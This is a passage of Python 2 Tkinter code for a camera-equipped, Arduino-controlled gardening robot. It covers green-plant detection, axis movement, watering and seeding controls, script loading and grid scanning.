self.lst_BinaryMethod_rdbox = list() self.BinaryMethodIndex= Tkinter.IntVar() for idx, name in enumerate(gui_vars.rdbox_BinaryMethodItem): self.lst_BinaryMethod_rdbox.append(Tkinter.Radiobutton(self.grp_BinaryMethod, text = name, value=idx, variable = self.BinaryMethodIndex, indicatoron=1, command= self.rdbtn_BinaryMethodIndex_click)) self.lst_BinaryMethod_rdbox[idx].place(x= gui_vars.interval_x+ (gui_vars.interval_rdbox+9)*idx, y=0) self.lst_BinaryMethod_rdbox[0].select() self.grp_BinaryMethod.place(x= gui_vars.interval_x, y=self.grp_PlantIndex.winfo_y()+ self.grp_PlantIndex.winfo_reqheight()+ gui_vars.interval_y*1) self.root.update() self.scale_threshold_graylevel = Tkinter.Scale(self.tab_imageprocess , from_= 0 , to = 255 , orient = Tkinter.HORIZONTAL , label = "Gray_level", font = myfont12, width = 7, length = 300 ) self.scale_threshold_graylevel.set(self.threshold_graylevel) self.scale_threshold_graylevel.place(x= self.grp_BinaryMethod.winfo_x(), y= self.grp_BinaryMethod.winfo_y()+ self.grp_BinaryMethod.winfo_reqheight()+gui_vars.interval_y*2) #self.scale_threshold_graylevel.config(state= 'disabled') self.root.update() self.scale_threshold_MinSize = Tkinter.Scale(self.tab_imageprocess, from_ = 0 , to = 99999 , orient = Tkinter.HORIZONTAL , label = "Min Contour_size", font = myfont12, width = 7, length = 300 ) self.scale_threshold_MinSize.set(self.threshold_MinSize) self.scale_threshold_MinSize.place(x= self.scale_threshold_graylevel.winfo_x(), y= self.scale_threshold_graylevel.winfo_y()+ self.scale_threshold_graylevel.winfo_height()) self.root.update() self.scale_threshold_MaxSize = Tkinter.Scale(self.tab_imageprocess, from_ = 0 , to = 99999 , orient = Tkinter.HORIZONTAL , label = "Max Contour_size", font = myfont12, width = 7, length = 300 ) self.scale_threshold_MaxSize.set(self.threshold_MaxSize) self.scale_threshold_MaxSize.place(x= self.scale_threshold_MinSize.winfo_x(), y= self.scale_threshold_MinSize.winfo_y()+ self.scale_threshold_MinSize.winfo_height()) # ================================================== # [ROOT] Main Image Frame # ================================================== #self.frame_width, self.frame_height= int(0.5*(self.screen_width-Left_width- gui_vars.interval_x*2)), int(0.5*(self.screen_height-self.FileMenu.winfo_reqheight()- self.statuslabel.winfo_reqheight() -gui_vars.interval_y*2)) self.frame_width, self.frame_height= int(0.5*(self.screen_width-Left_width- gui_vars.interval_x*2)), int(0.5*(self.screen_height-self.FileMenu.winfo_reqheight()*0- self.statuslabel.winfo_reqheight() -gui_vars.interval_y*1)) print '*** Frame w,h: ',self.frame_width, self.frame_height self.frame= np.zeros((int(self.frame_height), int(self.frame_width),3),np.uint8) #frame= cv2.resize(frame,(self.frame_width,self.frame_height),interpolation=cv2.INTER_LINEAR) result = Image.fromarray(self.frame) result = ImageTk.PhotoImage(result) self.panel = Tkinter.Label(self.root , image = result) self.panel.image = result self.panel.place(x=Left_width+gui_vars.interval_x, y= 0) self.root.update() # ================================================== # [ROOT] Display merge Image Frame # ================================================== self.mergeframe_width, self.mergeframe_height= self.frame_width, self.frame_height*2+2 self.mergeframe= np.zeros((int(self.mergeframe_height), int(self.mergeframe_width),3),np.uint8) #frame= cv2.resize(frame,(self.frame_width,self.frame_height),interpolation=cv2.INTER_LINEAR) cv2.putText(self.mergeframe, 'Display Scanning Result',(10,20),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1) result = Image.fromarray(self.mergeframe) result = ImageTk.PhotoImage(result) self.panel_mergeframe = Tkinter.Label(self.root , image = result) self.panel_mergeframe.image = result self.panel_mergeframe.place(x=self.panel.winfo_x()+ self.panel.winfo_reqwidth(), y= 0) self.root.update() # ================================================== # [ROOT] One Shot Image Frame # ================================================== self.singleframe_width, self.singleframe_height= self.frame_width, self.frame_height self.singleframe= np.zeros((int(self.singleframe_height), int(self.singleframe_width),3),np.uint8) cv2.putText(self.singleframe, '1 shot Result',(10,20),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1) result = Image.fromarray(self.singleframe) result = ImageTk.PhotoImage(result) self.panel_singleframe = Tkinter.Label(self.root , image = result) self.panel_singleframe.image = result self.panel_singleframe.place(x=self.panel.winfo_x(), y= self.panel.winfo_y()+ self.panel.winfo_height()) self.root.update() # ================================================== # Camera & Arduino Connection # ================================================== self.ArdMntr= MonitorThread() self.ArdMntr.start() self.CamMntr= CameraLink(self.CameraID) #self.CamMntr.connect_camera() # ================================================== # Green Plant Indetifier # ================================================== self.plantsArea = PlantIdentifier() # ================================================== # UI callback setting # ================================================== self.panel.after(50, self.check_frame_update) self.lbl_CurrPos.after(5, self.UI_callback) self.statuslabel.after(5, self.check_status) self.panel_mergeframe.bind('<Button-1>',self.mouse_LeftClick) self.root.bind('<F1>',self.rdbtn_MvAmount_click) self.root.bind('<F2>',self.rdbtn_MvAmount_click) self.root.bind('<F3>',self.rdbtn_MvAmount_click) self.root.bind('<F4>',self.rdbtn_MvAmount_click) self.root.bind('<F5>',self.rdbtn_MvAmount_click) #self.root.bind('<Up>',self.btn_MoveUp_click) self.root.bind('<Up>',self.btn_MoveAmount_click) self.root.bind('<Down>',self.btn_MoveAmount_click) self.root.bind('<Left>',self.btn_MoveAmount_click) self.root.bind('<Right>',self.btn_MoveAmount_click) self.root.bind('<Control-Up>',self.btn_MoveAmountZaxis_click) self.root.bind('<Control-Down>',self.btn_MoveAmountZaxis_click) ''' self.root.bind('<Down>',self.btn_MoveDown_click) self.root.bind('<Left>',self.btn_MoveLeft_click) self.root.bind('<Right>',self.btn_MoveRight_click) self.root.bind('<Control-Up>',self.btn_MoveZUp_click) self.root.bind('<Control-Down>',self.btn_MoveZDown_click) ''' # ====== Override CLOSE function ============== self.root.protocol('WM_DELETE_WINDOW',self.on_exit) # ================================================== # Thread # ================================================== self.main_run_judge= True #self.thread_main= threading.Thread(target= self.main_run) self.thread_main= class_MyThread.Thread(self.main_run) self.thread_main.start() self.scanning_judge= True #self.thread_scanning= threading.Thread(target= self.scanning_run) #self.thread_scanning= class_MyThread.Thread(self.scanning_run) #self.thread_scanning.start() time.sleep(1) if self.ArdMntr.connect: self.ArdMntr.set_MaxSpeed(self.MaxSpeed[0],'x') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[1],'y') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[2],'z') self.ArdMntr.set_Acceleration(self.Acceleration[0],'x') self.ArdMntr.set_Acceleration(self.Acceleration[1],'y') self.ArdMntr.set_Acceleration(self.Acceleration[2],'z') def store_para(self, arg_filepath, arg_filename): saveDict={} saveDict['thrshd_gray']= self.scale_threshold_graylevel.get() saveDict['thrshd_Minsize']= self.scale_threshold_MinSize.get() saveDict['thrshd_Maxsize']= self.scale_threshold_MaxSize.get() saveDict['Scan_X (Beg,Interval,Amount)']= [int(self.entry_1stXpos.get()), int(self.entry_ScanInterval_X.get()), int(self.entry_ScanAmount_X.get())] saveDict['Scan_Y (Beg,Interval,Amount)']= [int(self.entry_1stYpos.get()), int(self.entry_ScanInterval_Y.get()), int(self.entry_ScanAmount_Y.get())] saveDict['limit Maximum (X,Y)']= self.limit saveDict['Max Speed (X, Y)']= self.MaxSpeed saveDict['Ac/Deceleration (X, Y)']= self.Acceleration saveDict['Camera ID']= self.CameraID saveDict['Peripheral Setting']= self.Peripheral_para saveDict['Move Amount type (5 types)']= self.rdbtnMvAmount_Mode saveDict['script Path']= self.scriptPath self.config.write_json(saveDict) print "Para set" # Override CLOSE function def on_exit(self): #When you click to exit, this function is called if tkMessageBox.askyesno("Exit", "Do you want to quit the application?"): self.store_para(gui_vars.saveParaPath, gui_vars.configName) print 'Close Main Thread...' self.main_run_judge= False self.ArdMntr.exit= True self.scanning_judge= False #self.CamMntr.stop_clean_buffer() #del(self.thread_main) self.thread_main.exit() print 'Close Arduino Thread...' #del(self.CamMntr.thread_clean_buffer) #print 'Close Scanning Thread...' #del(self.thread_scanning) print self.MaxSpeed self.CamMntr.release_cap() self.root.destroy() def UI_callback(self): if self.ArdMntr.connect== True: tmp_text= 'Location: (X, Y, Z)= ('+self.ArdMntr.cmd_state.strCurX+', '+self.ArdMntr.cmd_state.strCurY+', '+self.ArdMntr.cmd_state.strCurZ+')' else: tmp_text='Arduino Connection Refuesed!' self.lbl_CurrPos.config(text= tmp_text) self.lbl_CurrPos.after(10,self.UI_callback) def IconResize(self, arg_readPath, arg_zoom=1, arg_subsample= 4): photo_resize=PhotoImage(file=arg_readPath) photo_resize= photo_resize.zoom(arg_zoom) photo_resize= photo_resize.subsample(arg_subsample) return photo_resize def mouse_LeftClick(self, event): if self.checkmouse_panel_mergeframe: mouse_x, mouse_y= event.x, event.y #print '>> mouse(X,Y): ',mouse_x, mouse_y #print '>> split(X,Y): ', self.mergeframe_splitX, self.mergeframe_splitY begX= gui_vars.interval_x begY= self.mergeframe_spaceY tmp_X, tmp_Y= int((mouse_x-begX)/self.mergeframe_splitX), int((mouse_y-begY)/self.mergeframe_splitY) #print '>> RANGE(X,Y): ',begY+ self.mergeframe_splitY*self.scan_Y[2] ,begX+ self.mergeframe_splitX*self.scan_X[2] if begX< mouse_x < begX+ self.mergeframe_splitX*self.scan_Y[2] and begY< mouse_y< begY+ self.mergeframe_splitY*self.scan_X[2]: #print 'tmp_X, tmp_Y= ', tmp_X, ', ', tmp_Y #2018.02.12 if self.readmergeframeIndex == gui_vars.scanIndex: readPath= gui_vars.saveScanningPath #tmp_filename= '{0}_{1}'.format(tmp_Y * self.scan_X[1], tmp_X * self.scan_Y[1]) tmp_filename= '{0}_{1}'.format((self.scan_X[2] - 1 - tmp_Y) * self.scan_X[1], tmp_X * self.scan_Y[1]) #2018.02.12 else: readPath= gui_vars.saveImageProccesPath #tmp_filename= '{0}_{1}'.format(tmp_Y, tmp_X) tmp_filename= '{0}_{1}'.format(self.scan_X[2] - 1 - tmp_Y, tmp_X) #2018.02.12 #print 'click file: ', tmp_filename tmp_frame= utils_tool.readImage(readPath+ self.readmergeframeIndex+'_'+self.saveTimeIndex+'_'+tmp_filename+'.jpg') if tmp_frame is not False: self.imagename= self.readmergeframeIndex+'_'+self.saveTimeIndex+tmp_filename self.singleframe= tmp_frame.copy() self.display_panel_singleframe(tmp_frame) mergeframe_canvas= self.mergeframe.copy() cv2.rectangle(mergeframe_canvas,(begX+self.mergeframe_splitX*tmp_X,begY+self.mergeframe_splitY*tmp_Y),(begX+self.mergeframe_splitX*(tmp_X+1), begY+self.mergeframe_splitY*(tmp_Y+1)),(0,255,100),2 ) result = Image.fromarray(mergeframe_canvas) result = ImageTk.PhotoImage(result) self.panel_mergeframe.configure(image = result) self.panel_mergeframe.image = result def check_status(self): self.statuslabel.config(text= self.strStatus) self.statuslabel.after(10,self.check_status) def Lock_Menubar(self, arg_Lock): if arg_Lock: self.menubar.entryconfig('File', state='disabled') self.menubar.entryconfig('Setting', state='disabled') self.menubar.entryconfig('Communication', state='disabled') self.menubar.entryconfig('Image Processing', state='disabled') self.checkmouse_panel_mergeframe= False else: self.menubar.entryconfig('File', state='normal') self.menubar.entryconfig('Setting', state='normal') self.menubar.entryconfig('Communication', state='normal') self.menubar.entryconfig('Image Processing', state='normal') self.checkmouse_panel_mergeframe= True def Lock_tabcontrol(self, arg_Lock): if arg_Lock: self.btn_MoveTo.config(state= 'disabled') self.entry_Xpos.config(state= 'disabled') self.entry_Ypos.config(state= 'disabled') self.entry_Zpos.config(state= 'disabled') self.btn_detect.config(state= 'disabled') self.btn_saveImg.config(state= 'disabled') self.entry_1stXpos.config(state= 'disabled') self.entry_1stYpos.config(state= 'disabled') self.entry_ScanInterval_X.config(state= 'disabled') self.entry_ScanInterval_Y.config(state= 'disabled') self.entry_ScanAmount_X.config(state= 'disabled') self.entry_ScanAmount_Y.config(state= 'disabled') self.checkmouse_panel_mergeframe= False self.btn_MoveUp.config(state= 'disabled') self.btn_MoveDown.config(state= 'disabled') self.btn_MoveLeft.config(state= 'disabled') self.btn_MoveRight.config(state= 'disabled') self.btn_MoveZUp.config(state= 'disabled') self.btn_MoveZDown.config(state= 'disabled') self.btn_Water.config(state= 'disabled') self.btn_Seed.config(state= 'disabled') self.btn_CamGrab.config(state= 'disabled') else: self.btn_MoveTo.config(state= 'normal') self.entry_Xpos.config(state= 'normal') self.entry_Ypos.config(state= 'normal') self.entry_Zpos.config(state= 'normal') self.btn_detect.config(state= 'normal') self.btn_saveImg.config(state= 'normal') self.entry_1stXpos.config(state= 'normal') self.entry_1stYpos.config(state= 'normal') self.entry_ScanInterval_X.config(state= 'normal') self.entry_ScanInterval_Y.config(state= 'normal') self.entry_ScanAmount_X.config(state= 'normal') self.entry_ScanAmount_Y.config(state= 'normal') self.checkmouse_panel_mergeframe= True self.btn_MoveUp.config(state= 'normal') self.btn_MoveDown.config(state= 'normal') self.btn_MoveLeft.config(state= 'normal') self.btn_MoveRight.config(state= 'normal') self.btn_MoveZUp.config(state= 'normal') self.btn_MoveZDown.config(state= 'normal') self.btn_Water.config(state= 'normal') self.btn_Seed.config(state= 'normal') self.btn_CamGrab.config(state= 'normal') def Lock_tabloadscript(self, arg_Lock): if arg_Lock: self.entry_scriptPath.config(state= 'disabled') self.btn_loadscript.config(state= 'disabled') self.btn_choosescript.config(state= 'disabled') self.btn_savescript.config(state= 'disabled') self.txtbox_script.configure(text_state= 'disabled') else: self.entry_scriptPath.config(state= 'normal') self.btn_loadscript.config(state= 'normal') self.btn_choosescript.config(state= 'normal') self.btn_savescript.config(state= 'normal') self.txtbox_script.configure(text_state= 'normal') def plastic_set_background(self): frame= self.CamMntr.get_frame() self.imageProcessor.set_background(frame) def rdbtn_PlantINdex_click(self): pass def rdbtn_BinaryMethodIndex_click(self): print 'BinaryMethodIndex: ',self.BinaryMethodIndex.get() if self.BinaryMethodIndex.get()==0: self.scale_threshold_graylevel.config(state= 'normal', label='Gray_level', fg='black') else: self.scale_threshold_graylevel.config(state= 'disabled', label='Gray_level (Disable)', fg= 'gray') def detectGreenPlant(self): self.plantsArea.setimage(self.singleframe) if self.PlantIndex.get()==0: _, image_plantIndex,_= self.plantsArea.LABimage(True) elif self.PlantIndex.get()==1: image_plantIndex= self.plantsArea.NDIimage(True) elif self.PlantIndex.get()==2: image_plantIndex= self.plantsArea.ExGimage(True) self.threshold_graylevel= self.scale_threshold_graylevel.get() image_plantIndex_thr= imgProcess_tool.binarialization(image_plantIndex.astype(np.uint8), self.BinaryMethodIndex.get(), self.threshold_graylevel) cv2.imwrite('Debug/img_thr.jpg',image_plantIndex_thr) self.threshold_MinSize, self.threshold_MaxSize=int(self.scale_threshold_MinSize.get()), int(self.scale_threshold_MaxSize.get()) result= imgProcess_tool.findContours(image_plantIndex_thr, self.plantsArea.image_raw, (self.threshold_MinSize, self.threshold_MaxSize),True) #self.singleframe= result_ExG self.display_panel_singleframe(result) self.set_mergeframe_size(2,2) self.reset_mergeframe() self.display_panel_mergeframe(self.singleframe.copy(), 0, 0) self.display_panel_mergeframe(image_plantIndex.astype(np.uint8), 1, 0) self.display_panel_mergeframe(image_plantIndex_thr, 0, 1) self.display_panel_mergeframe(result, 1, 1) self.saveTimeIndex= datetime.now().strftime('%Y%m%d%H%M%S') self.readmergeframeIndex= gui_vars.rdbox_PlantIndexItem[self.PlantIndex.get()] print '=== ', gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex self.saveImg_function(self.singleframe, gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex+'_0_0') self.saveImg_function(image_plantIndex.astype(np.uint8), gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex+'_0_1') self.saveImg_function(image_plantIndex_thr, gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex+'_1_0') self.saveImg_function(result, gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex+'_1_1') self.checkmouse_panel_mergeframe= True pass def method_OtsuBinary(self): print 'Start Otsu Binary.... ' ''' self.imageProcessor.set_threshold_size(int(self.scale_threshold_MinSize.get())) self.imageProcessor.set_threshold_graylevel(int(self.scale_threshold_graylevel.get())) result= self.imageProcessor.get_contour(self.singleframe, True, gui_vars.savePath, 'Otsu_Binary_'+self.imagename, 1) ''' self.threshold_MaxSize= int(self.scale_threshold_MaxSize.get()) img_thr= imgProcess_tool.binarialization(self.singleframe, 1) result= imgProcess_tool.findContours(img_thr, self.singleframe, [0,self.threshold_MaxSize] ) self.display_panel_singleframe(result) def method_SimpleBinary(self): print 'rdbtn: ',self.PlantIndex.get() print 'Start Binarization with ... ' ''' self.imageProcessor.set_threshold_size(int(self.scale_threshold_MinSize.get())) self.imageProcessor.set_threshold_graylevel(int(self.scale_threshold_graylevel.get())) result= self.imageProcessor.get_contour(self.singleframe, True, gui_vars.savePath, 'Simple_Binary_'+self.imagename, 0) ''' self.threshold_MaxSize= int(self.scale_threshold_MaxSize.get()) self.threshold_graylevel= int(self.scale_threshold_graylevel.get()) img_thr= imgProcess_tool.binarialization(self.singleframe, 0, self.threshold_graylevel) result= imgProcess_tool.findContours(img_thr, self.singleframe, [0,self.threshold_MaxSize]) self.display_panel_singleframe(result) def set_ArdConnect(self): self.ArdMntr.connect_serial() def set_CamConnect(self): cameraID= CameraConnection(self.root, self.CamMntr.camera_id) print '*** ',cameraID.result, ', ', self.CamMntr.camera_id if cameraID.result is not None and cameraID.result != self.CamMntr.camera_id: print 'Switch Camera ID' self.CamMntr.connect_camera(cameraID.result) self.CameraID= self.CamMntr.camera_id def set_Peripheral(self): #Var= PeripheralSetting(self.root, [('Fan',8),('Water Pump',9)]) #print '>>> ',self.Peripheral_para Var= PeripheralSetting(self.root, self.Peripheral_para) if Var.result is not None: self.Peripheral_para= Var.result print '*** Return Value: ',Var.result #-2018.02.28-CGH for key, value in self.Peripheral_para: if key.strip().replace(' ','').lower() == 'waterpump': # is -> == 2018.02.28 self.pinNumb_water= value print 'pinNumb_water: ', self.pinNumb_water #2018.02.28 if key.strip().replace(' ','').lower() == 'vaccumpump': # is -> == 2018.02.28 self.pinNumb_seed= value print 'pinNumb_seed: ', self.pinNumb_seed #2018.02.28 if key.strip().replace(' ','').lower() == 'fan': # is -> == 2018.02.28 self.pinNumb_fan= value print 'pinNumb_fan: ', self.pinNumb_fan #2018.02.28 def set_Motor(self): if self.ArdMntr.connect: Var= MotorSetting(self.root, self.MaxSpeed, self.Acceleration) if Var.result is not None: print 'result: ',Var.result #self.MaxSpeed= [Var.result[0], Var.result[2]] #self.Acceleration= [Var.result[1], Var.result[3]] self.MaxSpeed= [Var.result[0], Var.result[2], Var.result[4]] self.Acceleration= [Var.result[1], Var.result[3], Var.result[5]] self.ArdMntr.set_MaxSpeed(self.MaxSpeed[0],'x') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[1],'y') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[2],'z') self.ArdMntr.set_Acceleration(self.Acceleration[0],'x') self.ArdMntr.set_Acceleration(self.Acceleration[1],'y') self.ArdMntr.set_Acceleration(self.Acceleration[2],'z') #self.ArdMntr.set_MaxSpeed() else: tkMessageBox.showerror("Error", "Arduino connection refused!\n Please check its connection.") def set_frame(self, frame): self.frame= frame def display_panel_singleframe(self, arg_frame): tmp_frame= cv2.cvtColor(arg_frame, cv2.COLOR_BGR2RGB) #tmp_frame = self.mark_cross_line(tmp_frame) tmp_frame= cv2.resize(tmp_frame,(self.singleframe_width,self.singleframe_height),interpolation=cv2.INTER_LINEAR) #2018.02.20-??? result = Image.fromarray(tmp_frame) result = ImageTk.PhotoImage(result) self.panel_singleframe.configure(image = result) self.panel_singleframe.image = result def reset_mergeframe(self): self.mergeframe= np.zeros((int(self.mergeframe_height), int(self.mergeframe_width),3),np.uint8) cv2.putText(self.mergeframe, 'Display Scanning Result',(10,20),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1) def set_mergeframe_size(self, arg_x, arg_y): self.mergeframe_splitX= int((self.mergeframe_width-gui_vars.interval_x*2)/arg_y) self.mergeframe_splitY= int((self.mergeframe_height-100)/arg_x) def display_panel_mergeframe(self, arg_frame, arg_stepX, arg_stepY): print '*** ',len(arg_frame.shape) if len(arg_frame.shape)==3: tmp_frame= cv2.cvtColor(arg_frame, cv2.COLOR_BGR2RGB) else: tmp_frame= cv2.cvtColor(arg_frame, cv2.COLOR_GRAY2RGB) tmp_frame= cv2.resize(tmp_frame,(self.mergeframe_splitX,self.mergeframe_splitY),interpolation=cv2.INTER_LINEAR) begX= gui_vars.interval_x+self.mergeframe_splitX*arg_stepX begY= self.mergeframe_spaceY+ self.mergeframe_splitY* arg_stepY self.mergeframe[begY:begY+ self.mergeframe_splitY, begX: begX+ self.mergeframe_splitX]= tmp_frame #begY= self.mergeframe_height- 50- self.mergeframe_splitY*arg_stepY #self.mergeframe[begY-self.mergeframe_splitY:begY, begX: begX+ self.mergeframe_splitX]= tmp_frame self.mergeframe_stepX= arg_stepX self.mergeframe_stepY= arg_stepY print '>> mergeframe_splitY, splitX= ', self.mergeframe_splitY, ', ', self.mergeframe_splitX print '>> tmp_frame.shape[0,1]= ', tmp_frame.shape[0],', ',tmp_frame.shape[1] result = Image.fromarray(self.mergeframe) result = ImageTk.PhotoImage(result) self.panel_mergeframe.configure(image = result) self.panel_mergeframe.image = result def rdbtn_MvAmount_click(self, event= None): if event is not None: if event.keysym == 'F1': self.rdbtn_MvAmount_1.select() elif event.keysym == 'F2': self.rdbtn_MvAmount_5.select() elif event.keysym == 'F3': self.rdbtn_MvAmount_10.select() elif event.keysym == 'F4': self.rdbtn_MvAmount_50.select() elif event.keysym == 'F5': self.rdbtn_MvAmount_100.select() self.Move_interval= self.MvAmount.get() print 'rdVal',self.Move_interval def btn_MoveAmount_click(self, event= None): #print '*** ',self.tabbox.index(self.tabbox.select()) #print '*** ',self.tabbox.select() if self.tabbox.index(self.tabbox.select())==0: if type(event) is types.StringType: move_type= event else: print'event.keysym ', event.keysym print 'event.keycode', event.keycode move_type= event.keysym print 'Test ',move_type is 'Up' #self.Move_interval= self.MvAmount.get() tmp_x, tmp_y, tmp_z= self.ArdMntr.get_CurPosition() print '==>>> ',tmp_x, tmp_y, tmp_z print '==>>> ',self.Move_interval*self.Move_intervalUnit if move_type == 'Up': self.ArdMntr.move_Coord(tmp_x+ self.Move_interval*self.Move_intervalUnit, tmp_y, tmp_z) elif move_type == 'Down': self.ArdMntr.move_Coord(tmp_x- self.Move_interval*self.Move_intervalUnit, tmp_y, tmp_z) elif move_type == 'Left': self.ArdMntr.move_Coord(tmp_x, tmp_y-self.Move_interval*self.Move_intervalUnit, tmp_z) elif move_type == 'Right': self.ArdMntr.move_Coord(tmp_x, tmp_y+self.Move_interval*self.Move_intervalUnit, tmp_z) def btn_MoveAmountZaxis_click(self, event= None): if self.tabbox.index(self.tabbox.select())==0: if type(event) is types.StringType: move_type= event else: move_type= event.keysym tmp_x, tmp_y, tmp_z= self.ArdMntr.get_CurPosition() if move_type == 'Up': self.ArdMntr.move_Coord(tmp_x, tmp_y, tmp_z+ self.Move_interval*self.Move_intervalUnit) elif move_type == 'Down': self.ArdMntr.move_Coord(tmp_x, tmp_y, tmp_z- self.Move_interval*self.Move_intervalUnit) def btn_Seed_click(self): if self.ArdMntr.connect: self.ArdMntr.switch_Seed(self.pinNumb_seed, not(self.ArdMntr.SeedOn)) print 'Seeding... ' def btn_Water_click(self): if self.ArdMntr.connect: self.ArdMntr.switch_Water(self.pinNumb_water,not(self.ArdMntr.WaterOn) , -1) print 'Watering... ' def btn_Light_click(self): if self.ArdMntr.connect: self.ArdMntr.switch_Light(self.pinNumb_fan, not(self.ArdMntr.LightOn)) print 'Lighting... ' #pass-2018.02.12 def btn_choosescript_click(self): str_scriptPath = tkFileDialog.askopenfilename(title = "Select file",filetypes = (("all files","*.*"),("Text File", "*.txt"),("jpeg files","*.jpg"))) print '>>>> ', str_scriptPath if str_scriptPath !="": self.entry_scriptPath.delete(0,"end") self.entry_scriptPath.insert(Tkinter.END, str_scriptPath) self.scriptPath= str_scriptPath def btn_loadscript_click(self): #self.scriptPath= self.entry_scriptPath.get() tmpPath= self.entry_scriptPath.get() if utils_tool.check_file(tmpPath): #self.txtbox_script.delete('1.0', END) self.txtbox_script.clear() self.txtbox_script.importfile(tmpPath) self.txtbox_script.configure(label_text= "- "+ tmpPath.split("/")[-1]+" -") else: tkMessageBox.showerror("Error", "'%s' dost not exist !" % tmpPath) ''' cmd_file = open(self.scriptPath, "r") lines = cmd_file.readlines() for line in lines: cmd = line.strip() if len(cmd)>0: self.txtbox_script.insert(END, cmd+'\n') cmd_file.close() ''' def btn_savescript_click(self): tmpPath= self.entry_scriptPath.get() self.txtbox_script.exportfile(tmpPath) def btn_runscript_click(self): if self.ArdMntr.connect: if self.StartRunScript_judge: #=================================== # Delete Scanning Thread #=================================== self.StartRunScript_judge= False del(self.thread_runningScript) ''' self.tabbox.tab(self.tab_control, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.Lock_tabloadscript(False) self.btn_runscript.config(text= 'RUN', fg='white', activeforeground= 'white', bg= self.bgGreen,activebackground= self.bgGreen_active) self.StartRunScript_judge= False ''' else: ''' content= self.txtbox_script.get("1.0", "end-1c") test= self.txtbox_script.getvalue() print 'type test:', type(test) with open('tmp.txt', "w") as out: out.write(content) ''' self.txtbox_script.exportfile("tmp.txt") #================================= # New Thread of Scanning process #================================ self.thread_runningScript= threading.Thread(target= self.runningScript_run) self.thread_runningScript.start() self.tabbox.tab(self.tab_control, state='disable') self.tabbox.tab(self.tab_imageprocess, state='disable') self.Lock_tabloadscript(True) self.btn_runscript.config(text= 'STOP', fg='white', activeforeground= 'white', bg= self.bgRed,activebackground= self.bgRed_active) self.StartRunScript_judge= True else: tkMessageBox.showerror("Error", "Arduino connection refused!") def btn_StartScan_click(self): self.imageProcessor.set_threshold_size(int(self.scale_threshold_MinSize.get())) self.imageProcessor.set_threshold_graylevel(int(self.scale_threshold_graylevel.get())) self.input_Zpos= int(self.entry_Zpos.get()) self.readmergeframeIndex= gui_vars.scanIndex print 'Start' if self.StartScan_judge: #=================================== # Delete Scanning Thread #=================================== self.StartScan_judge= False del(self.thread_scanning) ''' self.Lock_tabcontrol(False) self.Lock_Menubar(False) self.tabbox.tab(self.tab_loadscript, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.btn_StartScan.config(text= 'Start Scan', fg='white', activeforeground= 'white', bg= self.bgGreen,activebackground= self.bgGreen_active) ''' else: if self.ArdMntr.connect: try: self.reset_mergeframe() self.scan_X= [int(self.entry_1stXpos.get()), int(self.entry_ScanInterval_X.get()), int(self.entry_ScanAmount_X.get())] self.scan_Y= [int(self.entry_1stYpos.get()), int(self.entry_ScanInterval_Y.get()), int(self.entry_ScanAmount_Y.get())] self.set_mergeframe_size(self.scan_X[2], self.scan_Y[2]) self.reset_mergeframe() #print '### ', self.scan_X, self.scan_Y self.ArdMntr.move_Coord(self.scan_X[0], self.scan_Y[0], self.input_Zpos) if self.scan_X[0]+self.scan_X[1]*self.scan_X[2]<self.limit[0] | self.scan_Y[0]+self.scan_Y[1]*self.scan_Y[2]<self.limit[1]: self.StartScan_judge= True #self.saveTimeIndex= datetime.now().strftime("%Y%m%d%H%M%S") self.saveTimeIndex= datetime.now().strftime('%Y%m%d%H%M%S') #================================= # New Thread of Scanning process #================================ self.thread_scanning= threading.Thread(target= self.scanning_run) self.thread_scanning.start() print '*** scanning...' self.Lock_tabcontrol(True) self.Lock_Menubar(True) self.tabbox.tab(self.tab_loadscript, state='disable') self.tabbox.tab(self.tab_imageprocess, state='disable') self.btn_StartScan.config(text= 'STOP Scan', fg='white', activeforeground= 'white', bg= self.bgRed, activebackground= self.bgRed_active) else: tkMessageBox.showerror("Error", "The scanning of X should be in [0~{0}]\nThe range of Y should be in [0~{1}]".format(self.limit[0],self.limit[1])) except: tkMessageBox.showerror('Error', 'Please enter nubmer') else: tkMessageBox.showerror("Error", "Arduino connection refused!") def btn_saveImg_click(self): #self.saveImg= True self.imagename= 'Frame1' self.singleframe = self.CamMntr.get_frame() self.saveImg_function(self.singleframe, gui_vars.savePath, self.imagename) self.display_panel_singleframe(self.singleframe) def btn_loadImg_click(self): str_imagePath = tkFileDialog.askopenfilename(title = "Select image",filetypes = (("jpeg files","*.jpg"), ("png files","*.png"), ("tif files","*.tif"),("all files","*.*"))) print '>>>> ', str_imagePath if str_imagePath !="": img= utils_tool.readImage(str_imagePath) if img is not False: self.singleframe= img.copy() self.display_panel_singleframe(self.singleframe) else: tkMessageBox.showerror('Image does not exist', 'The image\n{0}\n does not exist. Please check the path again') def btn_MoveTo_click(self): if self.ArdMntr.connect: try: Target_X= int(self.entry_Xpos.get()) Target_Y= int(self.entry_Ypos.get()) Target_Z= int(self.entry_Zpos.get()) if (Target_X>=0) & (Target_X<=self.limit[0]) & (Target_Y>=0) & (Target_Y<=self.limit[1]): cmd= 'G00 X{0} Y{1} Z{2}'.format(Target_X, Target_Y, Target_Z) #self.ArdMntr.serial_send(cmd) print 'ArdMntr.move_Coord...' self.ArdMntr.move_Coord(Target_X, Target_Y, Target_Z) print 'Command: ',cmd time.sleep(1) else: tkMessageBox.showerror("Error", "The range of X should be in [0~{0}]\nThe range of Y should be in [0~{1}]".format(self.limit[0],self.limit[1])) except: tkMessageBox.showerror("Error", "Please enter number!") else: tkMessageBox.showerror("Error", "Arduino connection refused!") def mark_cross_line(self , frame): w = frame.shape[0] / 2 h = frame.shape[1] / 2 cv2.line(frame , (h - 15 , w) , (h + 15 , w) , (255 , 0 , 0) , 1) cv2.line(frame , (h , w - 15) , (h , w + 15) , (255 , 0 , 0) , 1) return frame def saveImg_function(self, 